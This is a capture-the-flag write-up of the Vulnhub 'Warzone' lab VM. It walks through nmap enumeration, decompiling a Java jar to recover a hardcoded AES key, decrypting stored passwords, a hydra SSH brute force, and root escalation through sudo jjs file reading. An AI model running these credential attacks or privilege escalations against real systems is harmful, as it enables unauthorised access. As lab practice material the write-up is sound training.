Vulnhub - Warzone

Posted on | In
My writeup on Warzone box.

Box Stats

Box Info Details
Box Name : Warzone
Series : Warzone
Difficulty : Medium
Release Date : 24 Oct 2020
OS : GNU/Linux
Maker : AL1ENUM
Download : Warzone

Summary

Hello all! This box took me around 5-6 hours to pwn it for real, it’s based on java stuff and i’ve no idea about java. I still don’t know how did i pwn it haha, i guess im very lucky. I suggest you to try it out for sure!! I’ll not say much now, let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
 
$ ip=192.168.1.8                                                                                                                                                                 130 ↵
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 19:20 EET
Nmap scan report for warzone.zte.com.cn (192.168.1.8)
Host is up (0.000095s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
5000/tcp open  upnp
MAC Address: 08:00:27:91:00:5C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.90 seconds
$ nmap -p 21,22,5000 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 19:20 EET
Nmap scan report for warzone.zte.com.cn (192.168.1.8)
Host is up (0.00042s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_dr-xr-xr-x    2 ftp      ftp          4096 Oct 22 12:49 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.16
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 43:30:8c:57:bc:49:68:49:9c:9a:53:e7:a9:b7:83:9f (RSA)
|   256 c9:8d:46:c8:ef:33:d2:62:21:3a:bf:95:cb:fb:44:a3 (ECDSA)
|_  256 9b:86:ff:5c:6c:61:50:d0:36:59:b0:7a:bf:77:b2:a6 (ED25519)
5000/tcp open  http    Werkzeug httpd 1.0.1 (Python 3.7.3)
|_http-server-header: Werkzeug/1.0.1 Python/3.7.3
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

Let’s start the enumeration with port 5000, if we check the source code of the main page we can see a cipher:

1
2
 
$ curl -s http://$ip:5000/ | tail -3
<!--GA DIE UHCEETASTTRNL-->

Tried some basic stuff like base64,rot13 etc but no luck. I fired up my favorite Cipher Identifier Lot of results, i tried them all but only 1 worked the Rail fence cipher!

Tried the GET AUTH CREDENTIALS with lot of ways like GET-AUTH-CREDENTIALS but no luck, in the end was a path haha.

http://$ip:5000/get/auth/credentials

We can see a table with usernames & encrypted passwords:

Let’s move now into FTP enumeration since we have anonymous allowed, we can see 2 files a .txt & .jar one. Let’s download them.

1
 
$ wget -q ftp://$ip/pub/note.txt ; wget -q ftp://$ip/pub/warzone-encrypt.jar

Note.txt: Attention, please encrypt always your password using the warzone-encrypt.jar

The .jar file is a compressed version of java class files. If we run it asks from us to enter a password to encrypt it:

1
2
3
4
5
 
$ java -jar warzone-encrypt.jar 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Symmetric Encryption by Alienum
enter the password to encrypt : 0xatom
encrypted password : nhXDvhARNZDk54f7P/DpFg==

Shell as commando

Now we need a java decompiler to move on, to understand the code of it and reverse it. I’ve no idea about java and stuff so i googled for one and i found this one JD-GUI You can simply install it using this command: apt-get install jd-gui

decompiler : takes a compiled application and produces source code

There are 3 interesting stuff here:

Main.class has the main code that encrypt the password:

AES.class has the background code that does all the job:

Obfuscated.class has the IV & the key:

We have to rewrite the Main.class & change the AES.class to decrypt. As i said i have no idea about java, never coded in my life but with lot of google and basic java tutorials i found the solution. Also eclipse helped me a lot, fixed my mistakes haha.

You can download eclipse from here Eclipse primary use is for developing java applications.

I googled for similar codes that do AES decrypt and i found the perfect example that helped me a lot! link

Let’s open eclipse and create 2 classes, the Main & AES. Let’s work on AES first. Copy & Paste all code until the void init() Also remove the import Other.Obfuscated; We will change this code:

1
2
3
4
5
6
7
8
9
 
 public String encrypt(byte[] data) {
    try {
      this.cipher.init(1, this.key, this.iv);
      byte[] encryptData = this.cipher.doFinal(data);
      return new String(Base64.getEncoder().encode(encryptData));
    } catch (Exception ex) {
      throw new RuntimeException(ex.getMessage());
    } 
  }

Into this with the help of the article & eclipse that fixed the variables & added throws:

1
2
3
4
 
 public static String decrypt(String strToDecrypt) throws InvalidKeyException, InvalidAlgorithmParameterException, IllegalBlockSizeException, BadPaddingException {
	  cipher.init(Cipher.DECRYPT_MODE, key, iv);
	  return new String(cipher.doFinal(Base64.getDecoder().decode(strToDecrypt)));
  }

Now let’s move into Main, that will go like this:

1
2
3
4
5
6
7
8
9
10
11
 
String iv = "w4rz0n3s3cur31vv";
String key = "w4rz0n3s3cur3k3y";
AES aes = new AES(iv, 128, key);
System.out.println(AES.decrypt("GJSFBy6jihz/GbfaeOiXwtqgHe1QutGVVFlyDXbxVRo="));
System.out.println(AES.decrypt("mnKbQSV2k9UzJeTnJhoAyy4TqEryPw6ouANzIZMXF6Y="));
System.out.println(AES.decrypt("jiYMm39vW9pTr+6Z/6SafQ=="));
System.out.println(AES.decrypt("v9yjWjP7tKHLyt6ZCw5sxtktXIYm5ynlHmx+ZCI4OT4="));
System.out.println(AES.decrypt("2czKTfl/n519Kw5Ze7mVy4BsdzdzCbpRY8+BQxqnsYg="));
System.out.println(AES.decrypt("+uj9HGdnyJvkBagdB1i26M9QzsxKHUI0EFMhhfaqt2A="));
System.out.println(AES.decrypt("eTQiiMXzrM4MkSItWUegd1rZ/pOIU0JyWlLNw2oW6oo="));
System.out.println(AES.decrypt("LBN5Syc7D7Bdj7utCbmBiT7pXU+bISYj33Qzf4CmIDs="));

You can find full codes here: Main.class AES.class

Now we can get the plaintext passwords:

1
2
3
4
5
6
7
8
 
p4r4tr00per_4lw4ys_fly
sp3c1alop3rations
thr33f0rces.SF
und3rs3ay0uc4ns33
il0veCalisthen1cs
c0mmandosArentRea1.!
!c4ny0uconnect.th3d0ts
r3al_eyes_real1ze_rea1_3y3s

Now we save the all usernames into a file and the passwords too and we perform a brute force attack on SSH:

1
2
3
4
5
6
7
 
$ hydra -L usernames.txt -P passwords.txt $ip ssh

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-26 23:09:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 64 login tries (l:8/p:8), ~4 tries per task
[DATA] attacking ssh://192.168.1.7:22/
[22][ssh] host: 192.168.1.7   login: commando   password: c0mmandosArentRea1.!

We have shell as commando!

1
2
3
4
5
6
7
8
9
10
11
 
$ ssh commando@$ip

+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+
   WARZONE    WARZONE    WARZONE    WARZONE    WARZONE    WARZONE
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
                 {Unauthorized access is prohibited}
commando@192.168.1.7's password: 

commando@warzone:~$ whoami;id
commando
uid=1001(commando) gid=1001(commando) groups=1001(commando)

Shell as captain

Under /home/captain/Desktop there is a hidden .crypt directory:

1
2
3
4
5
6
7
8
 
commando@warzone:/home/captain/Desktop/.crypt$ ls -la
total 24
drwxr-xr-x 2 captain captain 4096 Oct 22 17:35 .
drwxr-xr-x 3 captain captain 4096 Oct 22 15:11 ..
-r--r--r-- 1 captain captain  116 Oct 22 17:25 .c
-r--r--r-- 1 captain captain  212 Oct 22 15:41 encrypt.py
-r--r--r-- 1 root    root     227 Oct 22 17:35 readme.txt
-r--r--r-- 1 captain captain   65 Oct 22 15:39 script.sh

readme.txt says this message:

Hey captain i gave you the scripts that i run to encrypt my password, it's exactly the same process and exactly the same path under our Desktop I do the same for your password, don't run it again trust me. -Your friend root

The python script:

1
2
3
4
5
6
7
8
 
from simplecrypt import encrypt, decrypt
import os
import base64
key = 'sekret'
password = '<REMOVED FOR SECURITY REASON>'
ciphertext = encrypt(key,password)
encoded = base64.b64encode(ciphertext)
print(encoded)

We can really easy reverse it, .c contains the encrypted password. First install the simplecrypt module: pip3 install simple-crypt We can see that after encryption there is a base64 encoding so we have to first base64 decode and then decrypt. The final code:

1
2
3
4
5
6
7
8
 
from simplecrypt import encrypt, decrypt
import os
import base64
key = 'sekret'
password = 'c2MAAk1Y/hAsEsn+FasElyXvGSI0JxD+n/SCtXbHNM+1/YEU54DO0EQRDfD3wz/lrbkXEBJJJd1ylXZpi/2dopaklmG6NCAXfGKl1eWAUNU1Iw=='
decode = base64.b64decode(password)
clean = decrypt(key,decode)
print(clean)

1
2
 
$ python3 decrypt.py 
b'_us3rz0ne_F1RE'

We have the password of captain and we can switch:

1
2
3
4
5
 
commando@warzone:/home/captain/Desktop/.crypt$ su - captain
Password: 
captain@warzone:~$ whoami;id
captain
uid=1000(captain) gid=1000(captain) groups=1000(captain),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),117(lpadmin),118(scanner)

Shell as root

If we check sudo -l we can run jjs as root:

1
2
3
4
5
6
 
captain@warzone:~$ sudo -l
Matching Defaults entries for captain on warzone:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User captain may run the following commands on warzone:
    (ALL) NOPASSWD: /usr/bin/jjs

gtfobins provide the answer, but sudo doesnt work just crash the shell. So we have to do the file read way. Before in readme.txt we can see this exactly the same path under our Desktop so we can read root’s .c file!

1
2
3
4
 
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/Desktop/.crypt/.c"));
while ((line = br.readLine()) != null) { print(line); }' | sudo jjs

1
2
3
4
5
6
7
8
9
10
 
captain@warzone:~$ echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/Desktop/.crypt/.c"));
while ((line = br.readLine()) != null) { print(line); }' | sudo jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/Desktop/.crypt/.c"));
jjs> while ((line = br.readLine()) != null) { print(line); }
b'c2MAArI9HzodWZVdjp8CL5Na/YetD8mpGmOR+zf0zmGeDy7KMsJ5YE3wNPSr4vCc5sV8w+BHq9yd5JHwGPKSuHClFqBUvhf/dSFUEKm9kG7/mPMPYg=='

We use the same script to decrypt it and we have shell as root:

1
2
 
$ python3 decrypt.py 
b'#i.d0nt.l1ke.w4r#'

1
2
3
4
5
 
captain@warzone:~$ su - root
Password: 
root@warzone:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Reading the flag(s)

1
2
3
4
5
6
7
 
root@warzone:~/Desktop# cat root.txt 
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
trophy : {gold_medal_warzone}
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
created by @AL1ENUM with <3
root@warzone:~/Desktop# cat /home/captain/Desktop/user.txt 
trophy : {silver_medal_warzone}

One of the BEST vulnhub boxes i ever did.

Thank You

Thank you for taking the time to read my writeup. If you don’t understand something from the writeup or want to ask me something feel free to contact me through discord(0xatom#8707) or send me a message through twitter 0xatom :blush:

Until next time keep pwning hard! :fire: